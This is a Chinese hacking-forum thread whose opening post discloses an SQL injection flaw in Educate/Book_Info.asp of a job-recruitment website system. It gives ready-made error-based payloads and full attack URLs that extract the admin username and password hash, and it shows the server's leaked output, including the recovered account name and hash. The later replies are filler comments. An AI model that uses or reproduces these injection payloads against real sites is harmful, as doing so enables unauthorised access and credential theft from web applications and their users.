查看: 1629|回复: 25

网络求职招聘人才网站系统正式版漏洞

[复制链接]
发表于 2013-2-14 09:50:16 | 显示全部楼层 |阅读模式

漏洞出现在Educate/Book_Info.asp

此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出

exp:如下
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)

http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)

Microsoft OLE DB Provider for SQL Server 错误 '80040e07'

将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。

/Educate/Book_Info.asp,行 8

http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)

Microsoft OLE DB Provider for SQL Server 错误 '80040e07'

将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。

/Educate/Book_Info.asp,行 8


发表于 2013-2-18 02:49:39 | 显示全部楼层
支持一下吧  
发表于 2013-2-20 04:54:40 | 显示全部楼层
@,@..是什么意思呀?  
发表于 2013-2-20 07:59:03 | 显示全部楼层
我帮你 喝喝  
发表于 2013-2-23 02:48:59 | 显示全部楼层
感謝樓主  
发表于 2013-2-24 21:38:41 | 显示全部楼层
接到陌生电话请先说,“你好,找哪位”  
发表于 2013-2-27 13:03:48 | 显示全部楼层
文笔流畅,修辞得体,深得魏晋诸朝遗风,更将唐风宋骨发扬得入木三分,能在有生之年看见楼主的这个帖子。实在是我三生之幸啊。  
发表于 2014-12-26 09:54:46 | 显示全部楼层
我不是随便的人。我随便起来不是人  
发表于 2015-1-26 13:16:26 | 显示全部楼层
貌似我真的很笨????哎  
发表于 2015-2-28 15:43:46 | 显示全部楼层
你喜欢贴子还是发贴子的人  
高级模式
B Color Image Link Quote Code Smilies

本版积分规则